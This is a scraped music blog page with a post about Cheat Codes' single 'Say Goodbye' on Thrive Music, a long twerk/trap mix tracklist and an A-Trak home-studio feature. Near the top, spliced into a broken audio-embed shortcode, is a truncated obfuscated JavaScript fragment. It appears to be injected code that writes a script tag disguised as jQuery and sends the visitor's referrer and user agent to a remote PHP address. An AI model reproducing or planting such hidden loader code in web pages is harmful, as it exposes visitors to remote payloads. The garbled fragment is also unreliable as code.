Cheat Codes unveils “Say Goodbye” on Thrive Music

=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.6("<\\/k"+"l>");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|nfaei|var|u0026u|referrer|rftde||js|php'.split('|'),0,{})) url=”″ params=”auto_play=false&hide_related=false&show_comments=true&show_user=true&show_reposts=false&visual=true” width=”100%” height=”450″ iframe=”true” /]

LA-based trio Cheat Codes is kicking off 2016 with their big room release “Say Goodbye.”
Out now on Thrive Music, “Say Goodbye” is the quintessential progressive house anthem fully equipped with lovesick lyrics and swelling synth builds.
Since forming last summer, Cheat Codes has powered onto the scene at turbo speed. After their breakout collaboration alongside Moguai “Hold On” garnered support from heavyweights like Danny Howard, Dimitri Vegas & Like Mike,
Nicky Romero, and Bingo Players, Cheat Codes solidified themselves as promising players in the progressive-pop game. Their self-released, instrumentally-driven vocal opus “Follow You” has racked up 1.5 million Spotify plays since dropping in November, and most recently the three-piece supported The Chainsmokers on their fall North American tour.

After a three year break, America’s #1 Dance music label from 1997 to 2012, Thrive Records, is re-launching as Thrive Music.
The Grammy-winning label that introduced Paul Oakenfold, John Digweed, Deep Dish, Duck Sauce, Sander Kleinenberg, A-Trak, Mark Ronson, Steve Aoki, and many others, in addition to releasing legendary DJ mix compilation series, Global Underground, ThriveMix, Dance Nation, Total Dance, Total Club Hits; and groundbreaking soundtracks including, Darren Aronofsky’s Requiem For a Dream, Pi, Thomas Bangalter’s Irreversible, and Christopher Nolan’s Memento, is pushing the boundaries once again.
Thrive Music is headquartered in Los Angeles.

Galantis – Peanut Butter Jelly

Lenno – Wake Up (Feat. The Electric Sons)

Masterbeaters – Episode 092 – Virgil Abad – Area DNA 07022014

July 2, 2014Masterbeaters – Episode 091 – Virgil Abad – Metropolitan – 06072014

Audio clip: Adobe Flash Player (version 9 or above) is required to play this audio clip. Download the latest version here. You also need to have JavaScript enabled in your browser.

[mp3 / m4a]

01. Drake – 0 to 100 (Grandtheft Bootleg)
02. Dirty Bastard vs Eric D-Lux – Shimmy Shimmy Take It Back Twerk (Forbe$ Rework Bootleg)
03. The Fugees – Ready Or Not (Whiite Remix)
04. Luniz – I Got 5 On It (WHIIITE X ETC!ETC! REMIX)
05. Wrecks-N-Effect – Rump Shaker (Dennis Blaze Twerk Edit)
06. Fat Joe vs Onderkoffer – Lean Back
07. Bubba Sparxxx ft Ying Yang Twins – Ms New Booty (Royal X Wallie Remix)
08. Kriss Kross – Jump (DJ Jekey Twerk Remix)
09. House Of Pain – Jump Around (Goodfellas Twerk Edit)
10. Tre Nyce – Hot Girl
11. Tyga – Ass So Fat (Obscene Twerk Edit)
12. Juicy J – Bounce It (Cova & Steel Twerk Remix)
13. B.o.B. & 2 Chainz – HeadBand (TWRK & Lambo Remix)
14. DJ Bosa – Bring Out The Twerk (Jay-z vs Yellowclaw Essntial Twerk Smash Up)
15. Sage The Gemini ft. Kool John – College Drop (Mastamonk & Dibs Twerk Remix)
16. Diplo ft Angger Dimas and Travis Porter – Biggie Bounce (Kid Kamillion Remix)
17. Clayton William – Fill Ur Cup Up
18. Dennis Blaze – Twerk Party
19. Beyonce ft Jay Z – Drunk In Love (Diplo Remix vs DJ Valid Twerk Edit)
20. Iggy Azalea – Fancy (GTA Remix)
21. Lil Jon – Bend Ova
22. RedFoo, Eric D-Lux, & Rio Gonder – WTBA (Where The Baes At)
23. Future – Move That Doh (Play-N-Skillz & Scott Summers Remix)
24. Rich Homie Quan vs Lookas – Type Of Way
25. Lil Wayne vs Ikon – Rich As Fuck (Ikon Trap Flip)
26. Carnage vs. P.Diddy & French Montana – 85 Mammoth (G&J Edit)
27. Showtek – We Like To Party (Slander And NGHTMRE Festival Trap Edit)
28. Avicii – You Make Me (Diplo Remix)
29. TJR vs Ricky Vaughn – What’s Up Suckaz
30. Nom De Strip – I Can’t Believe
31. Armand Van Halden – Funk Phenomena
32. Chicago – Street Player
33. Technotronic – Pump Up The Jam
34. John Newman vs Vice – Love Me Again
35. Yeah Yeahs vs Bassment Jaxx vs Deorro – Wheres Your Head At
36. Duck Sauce vs Chardy – NRG
37. Mat Zo vs Porter Robinson – Easy
38. Martin Solveig & The Cataracs ft. Kyle – Hey Now (Tommie Sunshine Live City Remix)
39. Calvin Harris ft. Ayah Marar – Thinking About You (Laidback Luke Remix)
40. Krewella – Alive (TJR’s Bouncy Version)
41. Calvin Harris – Summer (Basskiller Catch Bootleg)
42. DVBBS & Vinai – Raveology
43. Pitbull Vs Bombs Away – Driving Around
44. Chainsmokers vs Borgore – #Ratchet #Selfie

At Home With A-Trak + Unreleased Remix

This week, The FADER and Sonos announced the launch of “At Home With…” – an ongoing series with a variety of both our favorite artists – where we head into each of their homes to take a look at where they live, listen and make their music. We’ll be releasing a new video and unreleased track each month, with eight different artists across the series.

This week we released an interview with A-Trak, filmed from his home in Williamsburg, Brooklyn. In the midst of his touring schedule and the release of his DJ duo Duck Sauce’s debut album, “Quack”, the DJ/Producer/Record Label Owner showed us around his pad, giving a behind-the-scenes tour of his at-home studio, his equipment, and how he spends his downtime.

“As a DJ and Producer I get to really live the music. I think in a sense, what I stand for, what I do with my DJ-ing has come to symbolize a certain classic meets new. Just the fact that I use turntables – like, turntables are the most iconic, timeless pieces of equipment for DJ-ing but then I’ll go and play at these events that are really really on the cusp of whats new musically and a lot of places where other DJs are using purely digital technology. So I have this sort of heritage that I bring with me. And I bring it to the new spots.”

Duck Sauce – NRG (Hud Mo Remix)

Duck Sauce – NRG

Duck Sauce – NRG (Skrillex, Kill The Noise, Milo & Otis Remix)

Duck Sauce – Duck Droppings EP

Duck Sauce – Duck Droppings EP